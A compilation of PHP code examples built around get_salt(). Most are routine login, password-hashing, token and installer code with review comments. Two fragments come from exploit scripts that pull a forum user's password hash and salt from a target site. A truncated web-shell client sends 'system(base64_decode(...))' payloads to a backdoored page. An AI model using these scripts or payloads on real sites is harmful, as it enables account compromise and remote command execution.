/**
 * Build the BigBlueButton "end meeting" URL for the current meeting.
 *
 * Only the URL is returned; no HTTP request is made from this function.
 *
 * NOTE(review): the URL is derived from the moderator password and the
 * shared salt, so the return value is presumably sensitive and should stay
 * out of logs and client-visible output. Confirm against the callers.
 *
 * @return mixed Whatever bigbluebuttonbn_getEndMeetingURL() returns
 */
function end_meeting()
{
    $meeting_id = get_meetingid();
    $moderator_pw = get_modpassword();
    $server_url = get_url();
    $shared_salt = get_salt();

    return bigbluebuttonbn_getEndMeetingURL($meeting_id, $moderator_pw, $server_url, $shared_salt);
}
示例#2
/**
 * Derive the share id for a visitor from a salted crypt() of the IP address.
 *
 * The raw IP is never used as the key: it is passed through crypt() with the
 * salt read via get_salt($saltfile), and that digest indexes the visit data.
 *
 * @param string $ip        Visitor address
 * @param string $saltfile  Passed to get_salt()
 * @param string $visitfile Passed to get_visits()
 * @return string|int "<digest>-<number of recorded answers>", or 0 when the
 *                    visitor has no recorded answers
 */
function get_share_id($ip, $saltfile, $visitfile)
{
    $visitor_key = crypt($ip, get_salt($saltfile));
    $visit_log = get_visits($visitor_key, $visitfile);

    // Nothing stored for this visitor: report the "no id" value.
    if ($visit_log == null || !isset($visit_log['ans'][$visitor_key])) {
        return 0;
    }

    return $visitor_key . '-' . count($visit_log['ans'][$visitor_key]);
}
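/**
 * Build the invitation token that $username issues for $requested_username.
 *
 * Layout: sha1(salt . username . requested_username) . username . checksum,
 * where the salt comes from get_salt($username) and the checksum is
 * get_checksum() over the first two parts.
 *
 * NOTE(review): the digest is a plain SHA-1 over concatenated fields, not a
 * keyed MAC. If the token is meant to prove that the inviter authorised the
 * invitation, hash_hmac() with a server-side key is the sturdier construction;
 * switching would invalidate invitations that were already issued.
 *
 * @param string $username           Inviting user
 * @param string $requested_username User the invitation is for
 * @return string The invitation token
 */
function get_proper_invitation($username, $requested_username)
{
    $salt = get_salt($username);
    // The unused date('m') local from the earlier version is gone: the token
    // never depended on the current month.
    $hashedTxt = sha1($salt . $username . $requested_username);
    $invite = $hashedTxt . $username;

    return $invite . get_checksum($invite);
}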
示例#4
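 /**
  * Authenticate an administrator from the POSTed credentials and echo a JSON result.
  *
  * Response shape: {"result": "r1"|"r2", "result_message": "..."}. "r1" means the
  * login session was populated; "r2" means result_message lists what failed.
  *
  * NOTE(review): the stored credential is SHA-1(password . get_salt()), a fast digest
  * with what looks like a site-wide salt. Moving to password_hash()/password_verify()
  * needs a coordinated change with the code that writes the hash.
  * NOTE(review): the separate "not exist" / "not match" / "not active" messages tell a
  * client which usernames are valid, and nothing in this method issues a new session id
  * after login. Confirm whether that is handled elsewhere.
  */
 public function login()
 {
     //post
     $param['username'] = $this->input->post('username', TRUE) ? $this->input->post('username', TRUE) : "";
     $param['password'] = $this->input->post('password', TRUE) ? hash('sha1', $this->input->post('password', TRUE) . get_salt()) : "";
     //end post
     $data['result'] = "r1";
     $data['result_message'] = "";
     if ($param['username'] == "") {
         $data['result'] = "r2";
         $data['result_message'] .= "Username must be filled. <br/>";
     }
     if ($param['password'] == "") {
         $data['result'] = "r2";
         $data['result_message'] .= "Password must be filled. <br/>";
     }
     if ($data['result'] == "r1") {
         $param_check['username'] = $param['username'];
         $result_check = $this->Model_admin->get_data($param_check);
         if ($result_check->num_rows() > 0) {
             //Get Username Detail
             $id = $result_check->row()->id;
             $active = $result_check->row()->active;
             $password = $result_check->row()->password;
             $id_role = $result_check->row()->id_role;
             $role_name = $result_check->row()->role_name;
             //End Get Username Detail
             if ($active == 0) {
                 $data['result'] = "r2";
                 $data['result_message'] .= 'Username is not active. <br/>';
             } else {
                 // hash_equals() compares the two digests as strings in constant time.
                 // The previous loose `!=` let PHP treat digests that look numeric
                 // (e.g. "0e" followed by digits) as equal numbers.
                 if (!hash_equals((string) $password, $param['password'])) {
                     $data['result'] = "r2";
                     $data['result_message'] .= 'Username and Password are not match.<br/>';
                 } else {
                     //Set Session Login
                     $sess_login = array('id' => $id, 'username' => $param['username'], 'id_role' => $id_role, 'role' => $role_name, 'logged_in' => TRUE);
                     $this->session->set_userdata($sess_login);
                     //End Set Session Login
                 }
             }
         } else {
             $data['result'] = "r2";
             $data['result_message'] .= 'Username is not exist. <br/>';
         }
     }
     echo json_encode($data);
 }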
示例#5
 /**
  * Update one row of the `admin` table: role, active flag and, optionally, password.
  *
  * Missing keys in $param fall back to 0 (id, id_role, active) or "" (password).
  * An empty password leaves the stored hash untouched.
  *
  * NOTE(review): the password is stored as SHA-1(password . get_salt()), a fast
  * digest. Any move to password_hash() has to be made together with the login check.
  *
  * @param array $param Keys read: id, id_role, password, active
  */
 function edit_data($param)
 {
     $id = 0;
     if (isset($param['id'])) {
         $id = $param['id'];
     }
     $id_role = 0;
     if (isset($param['id_role'])) {
         $id_role = $param['id_role'];
     }
     $password = "";
     if (isset($param['password'])) {
         $password = $param['password'];
     }
     $active = 0;
     if (isset($param['active'])) {
         $active = $param['active'];
     }

     // Columns are added in the same order the two original literals used.
     $changes = array('id_role' => $id_role);
     if ($password != "") {
         $changes['password'] = hash('sha1', $password . get_salt());
     }
     $changes['active'] = $active;
     $changes['modtime'] = date('Y-m-d H:i:s');
     $changes['modby'] = $this->session->userdata('username');

     $this->db->where('id', $id);
     $this->db->update('admin', $changes);
 }
示例#6
/**
 * Derive a session identifier from the username, password and a random value.
 *
 * The three inputs are concatenated, XOR-ed byte by byte against the string
 * returned by get_salt(), passed through khkh() and lower-cased.
 *
 * NOTE(review): the identifier is a function of the user's password and a
 * repeating-key XOR rather than an independent random value; what khkh() adds
 * cannot be seen from here. A session id taken directly from a CSPRNG would not
 * depend on the credential at all. Confirm how this value is used.
 *
 * @param string $username
 * @param string $password
 * @return string Lower-cased result of khkh()
 */
function new_session($username, $password)
{
    // Draw values until one consists only of the characters a-f and 0-4.
    // NOTE(review): the class is a-f0-4, not a-f0-9; this looks unintended, confirm.
    do {
        $random_var = get_random();
    } while (preg_match("/[^a-f0-4]/", $random_var));
    $clear = $username . $password . $random_var;
    $salt = get_salt();
    $result = '';
    // The inner loop advances $i together with $j and does not re-check $i against
    // strlen($clear); the outer loop then increments $i once more, so one position
    // of $clear is skipped after every pass over $salt.
    for ($i = 0; $i < strlen($clear); $i++) {
        for ($j = 0; $j < strlen($salt); $j++, $i++) {
            $result .= $clear[$i] ^ $salt[$j];
        }
    }
    $result = khkh($result);
    $session = strtolower($result);
    return $session;
}
示例#7
<?php

include 'includes/file.php';
// Record one visit for the requesting client. The client is keyed by a salted
// crypt() of its address, so the raw IP is not what gets passed to add_visit().
// NOTE(review): $_GET['ans'] reaches add_visit() unvalidated; what add_visit()
// does with it is not visible here, so confirm it is constrained before storage.
if (isset($_GET['false'])) {
    $visitor_key = crypt($_SERVER['REMOTE_ADDR'], get_salt('./data/salt.sav'));
    add_visit($visitor_key, './data/visits.sav', true);
    echo "n";
} elseif (isset($_GET['ans'])) {
    $visitor_key = crypt($_SERVER['REMOTE_ADDR'], get_salt('./data/salt.sav'));
    add_visit($visitor_key, './data/visits.sav', false, $_GET['ans']);
    echo "s";
}
示例#8
/**
 * Hash a password as md5(md5(password) . salt).
 *
 * A falsy $salt is replaced by a fresh value from get_salt().
 *
 * NOTE(review): MD5 is a fast digest and not a password-hashing function;
 * password_hash()/password_verify() are the replacements, but every stored
 * hash and every caller of this helper would have to migrate together.
 *
 * @param string $password Clear-text password
 * @param string $salt     Per-user salt, or a falsy value to generate one
 * @return string 32-character hexadecimal digest
 */
function password_dohash($password, $salt)
{
    $effective_salt = $salt ?: get_salt();
    $inner_digest = md5($password);

    return md5($inner_digest . $effective_salt);
}
示例#9
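 /**
  * Installation step: validate the form, connect to the database, write the
  * configuration, create the tables and register the first administrator.
  *
  * On a failed validation the install form is shown again with the submitted
  * (or default) values.
  *
  * NOTE(review): install.lock is written here, but this method does not check for
  * it before running. Presumably the check lives elsewhere in the controller;
  * confirm, because this endpoint rewrites the database configuration.
  * NOTE(review): the administrator password goes through password_dohash(), which
  * is not visible in this block. Confirm which digest it uses.
  */
 public function process()
 {
     $this->load->helper('form');
     $this->load->library('form_validation');
     $data['item']['dbhost'] = $this->input->post('dbhost') ? $this->input->post('dbhost') : 'localhost';
     $data['item']['port'] = $this->input->post('port') ? $this->input->post('port') : '3306';
     $data['item']['dbprefix'] = $this->input->post('dbprefix') ? $this->input->post('dbprefix') : 'stb_';
     $data['item']['username'] = $this->input->post('username') ? $this->input->post('username') : 'admin';
     $data['item']['email'] = $this->input->post('email') ? $this->input->post('email') : '*****@*****.**';
     if ($this->form_validation->run() === TRUE) {
         $dbhost = $this->input->post('dbhost');
         $dbuser = $this->input->post('dbuser');
         $dbpsw = $this->input->post('dbpsw');
         $dbname = $this->input->post('dbname');
         $port = $this->input->post('port');
         $dbprefix = $this->input->post('dbprefix');
         $salt = get_salt();
         $password = password_dohash($this->input->post('password'), $salt);
         $admin = array('group_type' => 0, 'gid' => 1, 'is_active' => 1, 'username' => $this->input->post('username'), 'password' => $password, 'salt' => $salt, 'email' => $this->input->post('email'), 'regtime' => time(), 'ip' => get_onlineip());
         // function_exists() takes the function NAME as a string. The previous bare
         // identifier was read as an undefined constant.
         if (function_exists('mysqli_connect')) {
             $con = mysqli_connect($dbhost, $dbuser, $dbpsw, $dbname, $port);
         } else {
             // The port variable is $port; the earlier $dbport was never defined,
             // so the legacy branch connected to "host:" with no port.
             $con = mysql_connect($dbhost . ':' . $port, $dbuser, $dbpsw);
         }
         // Check that the database settings are usable
         if (!$con) {
             $string = '
             <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
             <script>
             alert("无法访问数据库,请重新安装!");
             top.location="' . site_url('install') . '";
             </script>
             ';
             exit($string);
         }
         // Write the database configuration file
         $this->_writeDBConfig($dbhost, $dbuser, $dbpsw, $dbname, $port, $dbprefix);
         // Create the tables
         $this->_createTables($dbhost, $dbuser, $dbpsw, $dbname, $port, $dbprefix, $con);
         // Drop the lock file that marks the installation as done
         file_put_contents(FCPATH . 'install.lock', time());
         // Update the application config
         $sub_folder = $this->input->post('base_url');
         if ($sub_folder) {
             $this->config->update('myconfig', 'sub_folder', $sub_folder);
         }
         // The encryption key protects framework secrets, so take it from a CSPRNG
         // when one is available. uniqid() is derived from the clock and can be
         // narrowed down by anyone who knows roughly when the site was installed.
         // All three branches yield 32 hexadecimal characters, as before.
         if (function_exists('random_bytes')) {
             $encryption_key = bin2hex(random_bytes(16));
         } elseif (function_exists('openssl_random_pseudo_bytes')) {
             $encryption_key = bin2hex(openssl_random_pseudo_bytes(16));
         } else {
             $encryption_key = md5(uniqid(mt_rand(), true));
         }
         if ($encryption_key) {
             $this->config->update('myconfig', 'encryption_key', $encryption_key);
         }
         sleep(1);
         // Register the administrator
         $this->load->database();
         $this->load->model('user_m');
         $this->user_m->register($admin);
         //update stats
         $this->db->set('value', 1)->where('item', 'total_users')->update('site_stats');
         $this->db->set('value', 1)->where('item', 'last_uid')->update('site_stats');
         $this->user_m->login($admin);
         $this->load->view('install_done');
     } else {
         $this->load->view('install_process', $data);
     }
 }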
示例#10
/**
 * Hash a secret with a salt, or recompute a hash for verification.
 *
 * With $sal === null a new hash is produced. Otherwise $sal is the previously
 * stored hash, and the result is what $clave hashes to under the same salt,
 * so the caller can compare the two.
 *
 * On PHP >= 5.3.2, or when $metodo is 'bcrypt', toba_hash is used. If its
 * verification result is 13 characters or shorter the call is treated as failed
 * (the stored hash may come from the older scheme) and the legacy format
 * salt . hash($metodo, salt . $clave) is used instead.
 *
 * @param string      $clave  Clear-text secret
 * @param string      $metodo Algorithm name passed to toba_hash / hash()
 * @param string|null $sal    Stored hash to verify against, or null for a new hash
 * @return string
 */
function encriptar_con_sal($clave, $metodo, $sal = null)
{
    $is_new_hash = is_null($sal);
    $use_toba_hash = $metodo == 'bcrypt' || version_compare(PHP_VERSION, '5.3.2') >= 0;

    if ($use_toba_hash) {
        $hasher = new toba_hash($metodo);
        if ($is_new_hash) {
            return $hasher->hash($clave);
        }
        $verifier = $hasher->get_hash_verificador($clave, $sal);
        if (strlen($verifier) > 13) {
            return $verifier;
        }
        // Short result: fall through to the legacy scheme below.
    }

    // Legacy scheme: the first 10 characters of a stored hash are its salt.
    $legacy_salt = $is_new_hash ? get_salt() : substr($sal, 0, 10);

    return $legacy_salt . hash($metodo, $legacy_salt . $clave);
}
示例#11
/**
 * Answer a client's "ask salt" request: look up the account and echo "1:<salt>".
 *
 * The salt is obtained by passing the stored Password column to get_salt().
 * Every failure path ends the script with die() and an errorMsgBlock() message.
 *
 * NOTE(review): as listed here the query literal contains '******' and does not
 * interpolate $login, most likely redaction by the page this listing came from.
 * Check the real source before relying on the lookup. Escaping $login with
 * mysqli_real_escape_string() is only effective if the value is placed inside
 * quotes; a prepared statement would remove that dependency.
 * NOTE(review): with $AcceptUnknownUser off, error 2001 distinguishes unknown
 * logins from known ones; with it on, unknown logins always get the fixed salt
 * "AA". Either way a client can tell the two cases apart unless the known-user
 * salts can also be "AA". Confirm whether that matters for this service.
 *
 * @param string $login Login name supplied by the client
 * @param string $lang  Language code for error messages
 */
function askSalt($login, $lang)
{
    global $PHP_SELF;
    global $DBHost, $DBUserName, $DBPassword, $DBName;
    global $AcceptUnknownUser;
    setMsgLanguage($lang);
    $link = mysqli_connect($DBHost, $DBUserName, $DBPassword) or die(errorMsgBlock(3004, 'main', $DBHost, $DBUserName));
    mysqli_select_db($link, $DBName) or die(errorMsgBlock(3005, 'main', $DBName, $DBHost, $DBUserName));
    $login = mysqli_real_escape_string($link, $login);
    $query = "SELECT Password FROM user WHERE Login='******'";
    // NOTE(review): on failure the error block receives the query text and
    // mysqli_error(); if errorMsgBlock() output reaches the client, that exposes
    // database details. Confirm what it prints.
    $result = mysqli_query($link, $query) or die(errorMsgBlock(3006, $query, 'main', $DBName, $DBHost, $DBUserName, mysqli_error($link)));
    if (mysqli_num_rows($result) != 1) {
        if ($AcceptUnknownUser) {
            // Accept the client anyway and return a fixed default salt.
            echo "1:AA";
            die;
        } else {
            die(errorMsgBlock(2001, $login, 'askSalt'));
            // Disabled code used to follow here: it looked the login up in
            // signup_data to handle unconfirmed accounts (no record: reject with
            // 2001; one record: salt from the first two characters of
            // GamePassword; several records: error 2003).
        }
    } else {
        $res_array = mysqli_fetch_assoc($result);
        $salt = get_salt($res_array['Password']);
    }
    echo "1:" . $salt;
    // Only reached on the success path; the die() branches above end the script
    // without closing the connection explicitly.
    mysqli_close($link);
}
示例#12
    } else {
        // Let's try to maximize our chances without CLI
        @set_time_limit(0);
    }
}
//=====================================================================
// Main sequence of the script. Every helper called here (xecho, add_line,
// test_target_url, test_target_id, get_hash, get_salt) is defined outside this
// excerpt, so only the order of operations can be described.

// Print the configured target and table prefix, then run the two checks.
xecho("Target: {$url}\n");
xecho("Sql table prefix: {$prefix}\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
// Retrieve the password hash and salt for the configured user id.
$hash = get_hash();
$salt = get_salt();
// add_line() presumably appends to a results file; confirm against its definition.
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
add_line("Salt: {$salt}");
add_line("------------------------------------------");
// The same values are echoed to the console before the script ends.
xecho("\n------------------------------------------\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
示例#13
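/**
 * Mark the current session as logged in for the given user.
 *
 * Stores the login flag, the username (cast to string) and a token from
 * get_salt(100) under $_SESSION["user"].
 *
 * NOTE(review): the token is only as unpredictable as get_salt(), which is not
 * visible here. Confirm that it draws from a CSPRNG.
 *
 * @param mixed $username Name to record for the authenticated user
 * @return void Nothing is returned (the earlier "@return bool" did not match the code)
 */
function z_login($username)
{
    // Issue a new session id at the moment of login, so an id that existed before
    // authentication cannot be carried over into the authenticated session
    // (session fixation). Skipped when no session is active or headers are already
    // out, where the call would only raise a warning.
    if (function_exists('session_status') && session_status() === PHP_SESSION_ACTIVE && !headers_sent()) {
        session_regenerate_id(true);
    }
    $_SESSION["user"]["status"] = TRUE;
    $_SESSION["user"]["name"] = "{$username}";
    $_SESSION["user"]["token"] = get_salt(100);
}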
示例#14
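 /**
  * Replace the `key` and `seckey` of one application row with fresh values.
  *
  * NOTE(review): both secrets come from get_salt(100), which is not visible here.
  * Since they act as API credentials, confirm that it draws from a CSPRNG.
  *
  * @param int|string $id Application id (coerced with intval)
  * @return bool TRUE when a row was updated; FALSE when the id does not exist,
  *              no row changed, or the statement failed
  */
 public function refresh($id)
 {
     global $table_prefix;
     $id = intval($id);
     $key = get_salt(100);
     $seckey = get_salt(100);
     if (!$this->isExistID($id)) {
         return FALSE;
     }
     try {
         $sth = $this->dbh->prepare("UPDATE {$table_prefix}apps SET `key`= :key, `seckey`= :seckey WHERE `id` = :id");
         $sth->bindParam(':key', $key);
         $sth->bindParam(':seckey', $seckey);
         $sth->bindParam(':id', $id);
         $sth->execute();
         return $sth->rowCount() > 0;
     } catch (PDOException $e) {
         // The class name was misspelled ("PDOExecption"), so this handler never
         // matched. The driver message goes to the server log rather than the
         // response, where it would expose schema details to the client.
         error_log('refresh() failed: ' . $e->getMessage());
         return FALSE;
     }
 }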
示例#15
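 /**
  * Password-reset landing page: verify the code in ?p= and, when the form
  * validates, store the new password and log the user in.
  *
  * ?p= is base64("<username>.<code>"), and the expected code is
  * md5(username . '+') . <stored password hash>.
  *
  * NOTE(review): the code is derived only from the username and the current
  * password hash. It has no expiry and stays valid until the password changes.
  * A random, single-use token stored server-side with an expiry would remove that
  * dependency; doing so also means changing the code that issues the link.
  */
 public function resetpwd()
 {
     $this->load->helper('form');
     $p = (isset($_GET['p']) && is_string($_GET['p'])) ? $_GET['p'] : '';
     $array = explode('.', (string) base64_decode($p));
     $username = $array[0];
     $supplied_code = isset($array[1]) ? $array[1] : '';
     $data = $this->user_m->getpwd_by_username($username);
     $stored_hash = (is_array($data) && isset($data['password'])) ? (string) $data['password'] : '';
     $checkCode = md5($username . '+') . $stored_hash;
     // Require an existing account with a stored hash. Without this check the
     // expected code for an unknown username collapses to md5(username . '+'),
     // which does not depend on any secret. hash_equals() then compares the two
     // strings in constant time.
     if ($stored_hash !== '' && hash_equals($checkCode, $supplied_code)) {
         if ($this->form_validation->run() === TRUE) {
             $salt = get_salt();
             $password = password_dohash($this->input->post('password'), $salt);
             if ($this->user_m->update_user($data['uid'], array('password' => $password, 'salt' => $salt))) {
                 $this->session->set_userdata(array('uid' => $data['uid'], 'username' => $username, 'group_type' => $data['group_type'], 'gid' => $data['gid']));
                 redirect('/');
             }
         }
     } else {
         show_message('非法重置!!');
     }
     // The view data reuses $data; make sure it is an array when no user was found.
     if (!is_array($data)) {
         $data = array();
     }
     $data['title'] = '设置新密码';
     $data['p'] = $p;
     $data['csrf_name'] = $this->security->get_csrf_token_name();
     $data['csrf_token'] = $this->security->get_csrf_hash();
     $this->load->view('findpwd', $data);
 }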
 /**
  * registerNewUser
  *
  * Handles the entire registration process: validates the POSTed fields, and when
  * they pass, connects to the database, hashes the password with crypt() (SHA-512,
  * 5000 rounds) and inserts the new user. Outcomes are reported through
  * $this->errors, $this->messages and $this->registration_successful.
  *
  * NOTE(review): the SQL statements are built by concatenating values escaped with
  * real_escape_string(). Prepared statements would not depend on every value being
  * escaped and quoted correctly.
  */
 private function registerNewUser()
 {
     if (empty($_POST['user_name'])) {
         $this->errors[] = "Empty Username";
     } elseif (empty($_POST['user_password_new']) || empty($_POST['user_password_repeat'])) {
         $this->errors[] = "Empty Password";
     } elseif ($_POST['user_password_new'] !== $_POST['user_password_repeat']) {
         $this->errors[] = "Password and password repeat are not the same";
     } elseif (strlen($_POST['user_name']) > 64) {
         $this->errors[] = "Username cannot be longer than 64 characters";
     } elseif (!preg_match('/^[a-z\\d]{2,64}$/i', $_POST['user_name'])) {
         $this->errors[] = "Username does not fit the name sheme: only a-Z and numbers are allowed, 2 to 64 characters";
     } elseif (empty($_POST['user_email'])) {
         $this->errors[] = "Email cannot be empty";
     } elseif (strlen($_POST['user_email']) > 64) {
         $this->errors[] = "Email cannot be longer than 64 characters";
     } elseif (!filter_var($_POST['user_email'], FILTER_VALIDATE_EMAIL)) {
         $this->errors[] = "Your email adress is not in a valid email format";
     } elseif (!empty($_POST['user_name']) && strlen($_POST['user_name']) <= 64 && preg_match('/^[a-z\\d]{2,64}$/i', $_POST['user_name']) && !empty($_POST['user_email']) && strlen($_POST['user_email']) <= 64 && filter_var($_POST['user_email'], FILTER_VALIDATE_EMAIL) && !empty($_POST['user_password_new']) && !empty($_POST['user_password_repeat']) && $_POST['user_password_new'] === $_POST['user_password_repeat']) {
         // This condition repeats the checks above in positive form; it is redundant,
         // but spells out exactly what must hold to enter this branch.
         // Open a database connection.
         $this->db_connection = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
         // Continue only when the connection succeeded.
         if (!$this->db_connection->connect_errno) {
             // Escape the values that will be placed into SQL strings.
             $this->user_name = $this->db_connection->real_escape_string($_POST['user_name']);
             // NOTE(review): the password is escaped BEFORE it is hashed, so the stored
             // hash is of the escaped text, not the raw input. The password itself never
             // enters an SQL string, so escaping it is not needed, and any verifier has
             // to apply the same transformation to match.
             $this->user_password = $this->db_connection->real_escape_string($_POST['user_password_new']);
             $this->user_email = $this->db_connection->real_escape_string($_POST['user_email']);
             // Cap the password at 1024 bytes to bound the hashing cost.
             $this->user_password = substr($this->user_password, 0, 1024);
             /*
              * get_salt()
              * Builds a random salt string for crypt() from the 64-character alphabet
              * below. The salt is not a secret and does not encrypt anything; it makes
              * equal passwords produce different hashes.
              * @see http://en.wikipedia.org/wiki/Salt_(cryptography)
              *
              * NOTE(review): rand() and str_shuffle() are not cryptographically secure
              * sources. The loop runs while $i <= $length, so it returns $length + 1
              * characters. Because the function is declared inside this method, PHP
              * defines it when this branch executes; a second execution in the same
              * request would try to declare it again.
              */
             function get_salt($length)
             {
                 $options = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./';
                 $salt = '';
                 for ($i = 0; $i <= $length; $i++) {
                     $options = str_shuffle($options);
                     $salt .= $options[rand(0, 63)];
                 }
                 return $salt;
             }
             // Largest salt length crypt() supports on this system.
             $max_salt = CRYPT_SALT_LENGTH;
             // crypt() prefix: "$6$" selects SHA-512 and "rounds=5000" sets the work
             // factor.
             // @see php.net/manual/en/function.crypt.php
             $hashing_algorithm = '$6$rounds=5000$';
             // Request the longest salt; SHA-512 crypt uses at most 16 salt characters
             // and ignores the rest.
             $salt = get_salt($max_salt);
             // Hash the password; the prefix and salt are embedded in the result, so
             // the stored string is self-describing for later verification.
             $this->user_password_hash = crypt($this->user_password, $hashing_algorithm . $salt);
             // Check whether the user name is already taken.
             $query_check_user_name = $this->db_connection->query("SELECT * FROM users WHERE user_name = '" . $this->user_name . "';");
             if ($query_check_user_name->num_rows == 1) {
                 $this->errors[] = "Sorry, that user name is already taken.<br/>Please choose another one.";
             } else {
                 // Insert the new user. NOTE(review): the check above and this insert
                 // are two separate statements; whether user_name has a unique index to
                 // cover concurrent registrations is not visible here.
                 $query_new_user_insert = $this->db_connection->query("INSERT INTO users (user_name, user_password_hash, user_email) VALUES('" . $this->user_name . "', '" . $this->user_password_hash . "', '" . $this->user_email . "');");
                 if ($query_new_user_insert) {
                     $this->messages[] = "Your account has been created successfully. You can now log in.";
                     $this->registration_successful = true;
                 } else {
                     $this->errors[] = "Sorry, your registration failed. Please go back and try again.";
                 }
             }
         } else {
             $this->errors[] = "Sorry, no database connection.";
         }
     } else {
         $this->errors[] = "An unknown error occured.";
     }
 }
示例#17
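 /**
  * Advance a pending user's verification state by swapping the stored token.
  *
  * The row must currently hold json_encode(["0", $token]); it is replaced by
  * json_encode(["<type>", <new random token>]) together with the current time.
  * Putting the old token in the WHERE clause makes the swap a single
  * compare-and-set.
  *
  * NOTE(review): the new token comes from get_salt(100), which is not visible
  * here. Confirm that it draws from a CSPRNG.
  *
  * @param string     $token Token the client presented
  * @param int|string $type  Verification type; only 1 and 2 are accepted
  * @param int|string $id    Row id in the users_temp table
  * @return bool TRUE when the row was updated, FALSE otherwise
  */
 public function updateVerifyToken($token, $type, $id)
 {
     global $table_prefix;
     $id = intval($id);
     $type = intval($type);
     $token = trim($token);
     if ($type != 1 && $type != 2) {
         return FALSE;
     }
     $verify_token = json_encode(array("{$type}", get_salt(100)));
     $check_token = json_encode(array("0", "{$token}"));
     $time = get_time();
     if (!$this->isExistID($id)) {
         return FALSE;
     }
     try {
         $sth = $this->dbh->prepare("UPDATE {$table_prefix}users_temp SET `verify_token`= :verify_token, `time`= :time WHERE `id` = :id AND `verify_token` = :check_token");
         $sth->bindParam(':verify_token', $verify_token);
         $sth->bindParam(':time', $time);
         $sth->bindParam(':id', $id);
         $sth->bindParam(':check_token', $check_token);
         $sth->execute();
         return $sth->rowCount() > 0;
     } catch (PDOException $e) {
         // The class name was misspelled ("PDOExecption"), so this handler never
         // matched. The driver message goes to the server log rather than the
         // response, where it would expose schema details to the client.
         error_log('updateVerifyToken() failed: ' . $e->getMessage());
         return FALSE;
     }
 }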
示例#18
 /**
  * Check the user's answer to the secret question; throw when it does not match.
  *
  * Both the stored answer and the submitted one are trimmed and hashed with the
  * same freshly generated salt, and the two hashes are compared.
  *
  * NOTE(review): when recuperar_pregunta_secreta() returns null the method returns
  * without any check. Presumably callers handle "no secret question" separately;
  * confirm, since this gates a password change.
  *
  * @param array $datos_usuario Submitted form data; reads 'respuesta'
  * @throws toba_error When the answer does not match
  */
 function verificar_desafio_secreto($datos_usuario)
 {
     $datos = $this->recuperar_pregunta_secreta($this->s__usuario);
     if (is_null($datos)) {
         return;
     }

     $salt = get_salt();
     $hash_esperado = encriptar_con_sal(trim($datos['respuesta']), 'SHA256', $salt);
     $hash_recibido = encriptar_con_sal(trim($datos_usuario['respuesta']), 'SHA256', $salt);
     if ($hash_esperado === $hash_recibido) {
         return;
     }

     // Mismatch: leave an audit trail, then reject.
     toba::logger()->error("Se intento cambiar la clave al usuario: {$this->s__usuario} pero falló la respuesta al desafío");
     throw new toba_error('Respuesta no Válida');
 }
    login_to_forum($argv[4], $argv[5]);
}
// Main sequence of the script for the chosen user id. The helpers called here
// (fetch_target_id, get_hash, get_salt, get_user, add_line, xecho) are defined
// outside this excerpt, so only the order of operations can be described.
$i = $chosen_id;
echo "Fetching topics from ID {$i}\n";
if (!fetch_target_id($i)) {
    // Nothing found automatically: ask the operator for a topic name instead.
    echo "No topics found.\n";
    fwrite(STDOUT, "Last ditch effort, enter topic: ");
    $topicname = trim(fgets(STDIN));
} else {
    echo "Topic found! Hacktime.\n";
}
// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if ($ch_option == 2) {
    // Option 2: record the id, password hash and salt as "id:hash:salt".
    $hash = get_hash($i);
    $salt = get_salt($i);
    $line = "{$i}:{$hash}:{$salt}";
    add_line($line);
    xecho("\n------------------------------------------\n");
    xecho("User ID: {$i}\n");
    xecho("Hash: {$hash}\n");
    xecho("Salt: {$salt}");
    xecho("\n------------------------------------------\n");
} else {
    if ($ch_option == 1) {
        // Option 1: record only the username that belongs to the id.
        $uname = get_user($i);
        $line = "The username for id {$i} is {$uname}";
        add_line($line);
        xecho("{$uname}");
    }
}
示例#20
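/**
 * Determine if the password is correct and salt it if it hasn't been already
 *
 * Accounts with a salt are checked against salted_hash(). Accounts without one
 * are checked against the legacy unsalted MD5 and, on success, upgraded through
 * save_salt().
 *
 * NOTE(review): the legacy branch still accepts bare MD5 hashes. It only goes
 * away once every account has logged in and been upgraded; consider forcing a
 * reset for the accounts that remain.
 *
 * @param string $userID The user ID to check the password against
 * @param string $passwd The password the visitor sent
 *
 * @return bool True if password was correct and properly salted, otherwise false
 */
function valid_passwd($userID, $passwd)
{
    $dbh = DB::connect();
    if ($passwd == "") {
        return false;
    }

    // Both lookups bind their values as parameters. The ID was previously
    // concatenated into the SQL text unquoted, so a crafted $userID could change
    // the statement.
    $sql = "SELECT ID FROM Users WHERE ID = ? AND Passwd = ?";

    /* Get salt for this user. */
    $salt = get_salt($userID);
    if ($salt) {
        $stmt = $dbh->prepare($sql);
        if (!$stmt || !$stmt->execute(array($userID, salted_hash($passwd, $salt)))) {
            return false;
        }
        $row = $stmt->fetch(PDO::FETCH_NUM);
        return $row && $row[0] > 0;
    }

    /* Check password without using salt. */
    $stmt = $dbh->prepare($sql);
    if (!$stmt || !$stmt->execute(array($userID, md5($passwd)))) {
        return false;
    }
    $row = $stmt->fetch(PDO::FETCH_NUM);
    if (!$row || !$row[0]) {
        return false;
    }

    /* Password correct, but salt it first! */
    if (!save_salt($userID, $passwd)) {
        trigger_error("Unable to salt user's password;" . " ID " . $userID, E_USER_WARNING);
        return false;
    }
    return true;
}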
示例#21
<?php

// Command-line client for a PHP page that evaluates a request parameter as code.
// Arguments: the page URL and the name of the evaluated parameter.
//
// For detection: every request this client sends is a GET carrying two query
// parameters: the named one, whose value contains
// "system(base64_decode($_GET[365234]));", and a parameter literally named
// "365234" holding a base64 string. Both patterns are visible in web-server
// access logs and can be matched in WAF or IDS rules.
if (!isset($argv[1]) || !isset($argv[2])) {
    echo "{$argv[0]} http://localhost/shell.php pass\n";
    exit;
}
while (1) {
    fwrite(STDOUT, "SHELL> ");
    $command = trim(fgets(STDIN));
    if ($command == 'exit') {
        break;
    }
    // Random marker echoed before and after the command output so the response
    // body can be cut at those two points.
    $salt = get_salt(10);
    // Append with "&" when the URL already has a query string, otherwise with "?".
